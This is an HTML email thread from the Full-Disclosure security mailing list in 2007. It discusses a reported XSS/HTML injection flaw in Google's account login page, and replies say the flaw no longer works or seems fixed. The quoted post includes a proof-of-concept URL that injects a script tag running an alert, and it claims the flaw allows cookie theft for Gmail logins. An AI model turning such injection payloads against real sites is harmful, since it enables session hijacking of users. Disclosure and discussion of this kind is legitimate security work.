<div>wow ! 0day !</div>
<div>damn, right now 0day are fucking XSS ...<br><br>&nbsp;</div>
<div><span class="gmail_quote">On 11/8/07, <b class="gmail_sendername">silky</b> &lt;<a href="mailto:michaelslists@gmail.com">michaelslists@gmail.com</a>&gt; wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">worked for me minutes after it was posted. seems fixed now.<br><br>On 11/9/07, crazy frog crazy frog &lt;<a href="mailto:i.m.crazy.frog@gmail.com">
i.m.crazy.frog@gmail.com</a>&gt; wrote:<br>&gt; i tested it on gmail latest version, it's not working for me?<br>&gt;<br>&gt; On Nov 8, 2007 7:04 AM, Scripter Hack &lt;<a href="mailto:xss2root@gmail.com">xss2root@gmail.com</a>
&gt; wrote:<br>&gt; &gt; There is an HTML injection vulnerability in <a href="https://www.google.com">https://www.google.com</a>.<br>&gt; &gt; It is very critical, you can get the cookie to login into gmail or other<br>&gt; &gt; service.
<br>&gt; &gt;<br>&gt; &gt; POC:<br>&gt; &gt; <a href="https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#">
https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#</a>&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;1-=1
<br>&gt; &gt;<br>&gt; &gt; More:<a href="http://xss2root.blogspot.com/">http://xss2root.blogspot.com/</a><br>&gt; &gt; _______________________________________________<br>&gt; &gt; Full-Disclosure - We believe in it.<br>&gt; &gt; Charter: 
<a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>&gt; &gt; Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a>
<br>&gt; &gt;<br>&gt;<br>&gt;<br>&gt;<br>&gt; --<br>&gt; advertise on secgeeks?<br>&gt; <a href="http://secgeeks.com/Advertising_on_Secgeeks.com">http://secgeeks.com/Advertising_on_Secgeeks.com</a><br>&gt; <a href="http://newskicks.com">
http://newskicks.com</a><br>&gt;<br><br><br>--<br>mike<br><a href="http://lets.coozi.com.au/">http://lets.coozi.com.au/</a><br></blockquote></div><br>